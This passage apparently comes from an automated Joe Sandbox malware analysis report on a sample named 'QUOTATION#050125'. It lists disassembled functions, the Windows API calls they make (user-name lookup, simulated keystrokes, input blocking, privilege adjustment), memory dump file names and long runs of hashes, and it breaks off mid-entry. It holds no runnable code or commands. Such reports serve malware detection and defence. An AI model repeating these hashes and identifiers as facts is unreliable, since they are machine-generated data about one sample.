                                                                                      • Opcode Fuzzy Hash: 66f8686cbf4736b9a9c41be0c083c6917ea6fb9b471e8d7654a85c7517337271
                                                                                      • Instruction Fuzzy Hash: B2E0B631005788EFCF51AF55DD09A983F69FF81792B108054FD05DA623CB35DD82DA80
                                                                                      Function 000FC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /
                                                                                      • API String ID: 0-2043925204
                                                                                      • Opcode ID: 802ca95a89219b985e151c83d86cb958af4139782ae3e3e79329b41b65edd8dc
                                                                                      • Instruction ID: 692e0714861022b332f7e76f77586b75620ec189908a145ad9b7799e53fc9a7a
                                                                                      • Opcode Fuzzy Hash: 802ca95a89219b985e151c83d86cb958af4139782ae3e3e79329b41b65edd8dc
                                                                                      • Instruction Fuzzy Hash: 3B415B7290021DAFDB209FB9CD4ADBB77B8EBC4354F104269FA05D7581E6709E80DB50
                                                                                      Function 0011D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0011D28C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameUser
                                                                                      • String ID: X64
                                                                                      • API String ID: 2645101109-893830106
                                                                                      • Opcode ID: b3f74d578713cff5cf66f419bd28fa7afd30c0439f0c257ef254a4031173e3f2
                                                                                      • Instruction ID: 10607fe7b41f377026fca243f8ce891669d7aba2b04a70328e63fd852b3f4a07
                                                                                      • Opcode Fuzzy Hash: b3f74d578713cff5cf66f419bd28fa7afd30c0439f0c257ef254a4031173e3f2
                                                                                      • Instruction Fuzzy Hash: AFD0C9B480121DEECF94CB90EC88DDDB7BCBB04305F100152F106A2140D77495888F20
                                                                                      Function 001368EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00136918
                                                                                      • FindClose.KERNEL32(00000000), ref: 00136961
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: f30a49bae1391b7428c09ebe100717a7bcd02561846f0dc9fa7134befb3349fd
                                                                                      • Instruction ID: 703e1f863f072150b11493b37a1c503e39af75cc562169807cc7e8405bd257ce
                                                                                      • Opcode Fuzzy Hash: f30a49bae1391b7428c09ebe100717a7bcd02561846f0dc9fa7134befb3349fd
                                                                                      • Instruction Fuzzy Hash: 02117C31604600AFD710DF29D484F1ABBE5EF85329F15C6ADE4699F6A2C730EC46CB91
                                                                                      Function 001337B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00144891,?,?,00000035,?), ref: 001337E4
                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00144891,?,?,00000035,?), ref: 001337F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFormatLastMessage
                                                                                      • String ID:
                                                                                      • API String ID: 3479602957-0
                                                                                      • Opcode ID: 33706c063f0ec429bed9d9da7adf4fb2aaac7fc2035214f4b8ead52e42825a9d
                                                                                      • Instruction ID: bdd302aa19936d476591579ccafcd3cbe5b466602637b4926f352a6ce12977cd
                                                                                      • Opcode Fuzzy Hash: 33706c063f0ec429bed9d9da7adf4fb2aaac7fc2035214f4b8ead52e42825a9d
                                                                                      • Instruction Fuzzy Hash: 13F0E5B06043296AE72017668C4DFEB3AAEEFC4761F000165F519D2691DA609944C7F0
                                                                                      Function 0012B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0012B25D
                                                                                      • keybd_event.USER32(?,753CA2E0,?,00000000), ref: 0012B270
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: InputSendkeybd_event
                                                                                      • String ID:
                                                                                      • API String ID: 3536248340-0
                                                                                      • Opcode ID: 6c1696db836a9d3458c763f15b59b799c60b0132ef55df125931a3a6008623c0
                                                                                      • Instruction ID: 4c2b865533df043d283452ff297b6f8029bb191b6ab6b04389a22c32e88b160b
                                                                                      • Opcode Fuzzy Hash: 6c1696db836a9d3458c763f15b59b799c60b0132ef55df125931a3a6008623c0
                                                                                      • Instruction Fuzzy Hash: 87F01D7190438EEFDB059FA0D805BAE7FB4FF08305F008009F965A9192D3799651DF94
                                                                                      Function 001210BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001211FC), ref: 001210D4
                                                                                      • CloseHandle.KERNEL32(?,?,001211FC), ref: 001210E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: 14e24295da903e25264e947d9fbcd1b0a1a9b891140926cf8d8a291e21e817d1
                                                                                      • Instruction ID: dceaa8d01bf5b5fc6d5ed2aa3b99623eb69282d3441e4142f1ed522b2b7e2c56
                                                                                      • Opcode Fuzzy Hash: 14e24295da903e25264e947d9fbcd1b0a1a9b891140926cf8d8a291e21e817d1
                                                                                      • Instruction Fuzzy Hash: 64E04F32004711EEE7252B51FC05EB377A9EB04311B10C82EF4A6844B2DB626CE0DB60
                                                                                      Function 000CCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Variable is not of type 'Object'., xrefs: 00110C40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Variable is not of type 'Object'.
                                                                                      • API String ID: 0-1840281001
                                                                                      • Opcode ID: 86d6967650c4b7db7ad7b5b96579cceea3e2f906b9cf75875484bd49600db274
                                                                                      • Instruction ID: 9979707c0b50a7abf1641d50c85473d600861e4d040bd5c92c532e790d046c47
                                                                                      • Opcode Fuzzy Hash: 86d6967650c4b7db7ad7b5b96579cceea3e2f906b9cf75875484bd49600db274
                                                                                      • Instruction Fuzzy Hash: 66327E74900218DBEF18DF94D881FEDB7B5BF09304F14406DE80AAB292D775AE86CB61
                                                                                      Function 000F676B Relevance: 1.8, APIs: 1, Instructions: 269COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000F6766,?,?,00000008,?,?,000FFEFE,00000000), ref: 000F6998
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 3d38beff9b730ad736290ed9ddfe32c8526d361d6fc7438ce93ee7d1cde36725
                                                                                      • Instruction ID: 895153ecf58358ce0267c247208f493558a8d0cf2063f83394a9e3ce3737edc8
                                                                                      • Opcode Fuzzy Hash: 3d38beff9b730ad736290ed9ddfe32c8526d361d6fc7438ce93ee7d1cde36725
                                                                                      • Instruction Fuzzy Hash: BEB16C31610608DFD755CF28C486B647BE0FF45364F29865CE99ACF6A2C736E982DB40
                                                                                      Function 000DB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 2df3c592bf445074fe3cd051023d91f9f603b7fd656f093ed65bd13792bc200a
                                                                                      • Instruction ID: e4f8145430d1d2876609337952a3140a967ae97fae00ba0bd1c44ae1e3f2fbc7
                                                                                      • Opcode Fuzzy Hash: 2df3c592bf445074fe3cd051023d91f9f603b7fd656f093ed65bd13792bc200a
                                                                                      • Instruction Fuzzy Hash: F7124175900229DBDB64CF58C881AEEB7F5FF48710F15816AE849EB255DB309E81CBA0
                                                                                      Function 000E0698 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000E06B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 2325560087-0
                                                                                      • Opcode ID: e4d6c73bbcfff00600f85d13d7b71a69ec4a76f49895e41d0f385524dadacb58
                                                                                      • Instruction ID: 8f48c1301ac603d769507b2cc7798dd6a2e1175504d1d494e2ec0bd4355f66c7
                                                                                      • Opcode Fuzzy Hash: e4d6c73bbcfff00600f85d13d7b71a69ec4a76f49895e41d0f385524dadacb58
                                                                                      • Instruction Fuzzy Hash: AB41AE71D05245CFEB59CF9AE9C569ABBF4FF48310F24806AD445EB660D3B4A980CFA0
                                                                                      Function 0013EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • BlockInput.USER32(00000001), ref: 0013EABD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockInput
                                                                                      • String ID:
                                                                                      • API String ID: 3456056419-0
                                                                                      • Opcode ID: b6061960566172e262e5adcca9175863928d346bfde5d985963917e142937582
                                                                                      • Instruction ID: 1dd19c41904bc87e2d50f6432a8098db728ad200409080f89841ac4314d389d7
                                                                                      • Opcode Fuzzy Hash: b6061960566172e262e5adcca9175863928d346bfde5d985963917e142937582
                                                                                      • Instruction Fuzzy Hash: B2E04F312003059FD710EF59D805E9AF7E9AF98760F00842AFC49CB391DB70E8418B90
                                                                                      Function 000E09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000E03EE), ref: 000E09DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 03391f66fb04785be65405be740459772f58e877bccce36d50f0432b68ca1e3a
                                                                                      • Instruction ID: dcf4ef48895afd9597ad5215be1ea7a8f1ab6bdb81cc765ab5c9fb2bc9d243ec
                                                                                      • Opcode Fuzzy Hash: 03391f66fb04785be65405be740459772f58e877bccce36d50f0432b68ca1e3a
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 000E781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction ID: 09da0e2873799e4f8b458868389a39aa8fd1336a06e8cfb83cf2f498919d77fb
                                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction Fuzzy Hash: 2451977168C6C55FDBB8856B8A597FE23C99F62300F18051AD98EF7283CE11DE01D352
                                                                                      Function 000F6DD9 Relevance: .6, Instructions: 637COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed164f075aef45cbf62344498d9acb0b56fd6f53942877fa71c08462a0db5d79
                                                                                      • Instruction ID: 83e1b719a77c3f9e1b37c8abd5cf33fa2eed58322d96203af69dad9430a4ed7f
                                                                                      • Opcode Fuzzy Hash: ed164f075aef45cbf62344498d9acb0b56fd6f53942877fa71c08462a0db5d79
                                                                                      • Instruction Fuzzy Hash: C2323222D29F054DD7639634CC22336A289AFB73C5F15C737E81AB5EAAEB69C4C35101
                                                                                      Function 000DCC39 Relevance: .6, Instructions: 635COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a1daeb65b9b887988e0d5492a9fe2890e00cdc49ec5d53346e7f0deafe4ef91a
                                                                                      • Instruction ID: 9ec4cc2e1abdf30387b77ddf22867a9f6e50c9886598dcb02bb9aeeaa7b6b11a
                                                                                      • Opcode Fuzzy Hash: a1daeb65b9b887988e0d5492a9fe2890e00cdc49ec5d53346e7f0deafe4ef91a
                                                                                      • Instruction Fuzzy Hash: B5320131A842168BDF2CCA28C594AFD7BA1AF45300F29817BD95A8B791E330DDC1DBD1
                                                                                      Function 000C7920 Relevance: .6, Instructions: 563COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e832914a039e9aeb600e7a4831baffa648c4f371ec2c16298d8d72a88f788b04
                                                                                      • Instruction ID: 3c31fdb879a3ca499b5864be6133bd625d96bae0837d560d6aa964c72ef2455d
                                                                                      • Opcode Fuzzy Hash: e832914a039e9aeb600e7a4831baffa648c4f371ec2c16298d8d72a88f788b04
                                                                                      • Instruction Fuzzy Hash: 41227D70A0460A9FDF14CFA4C881BEEB7B6FF44300F144529E856AB291EB76AE55CF50
                                                                                      Function 000C91C0 Relevance: .5, Instructions: 475COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7542d374735e27f5c44f18d7c87699b1b05263207d29ad02df89eb21efcc039
                                                                                      • Instruction ID: 527bba27562e6b7fee4cf4fab65104abc428ae5ca697ed64da699e87014f551e
                                                                                      • Opcode Fuzzy Hash: a7542d374735e27f5c44f18d7c87699b1b05263207d29ad02df89eb21efcc039
                                                                                      • Instruction Fuzzy Hash: 0E02C5B0A0020AEBDB04DF55D981BAEB7F5FF44300F118569E8569B3D1EB71EA60CB91
                                                                                      Function 000ECAA0 Relevance: .5, Instructions: 464COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
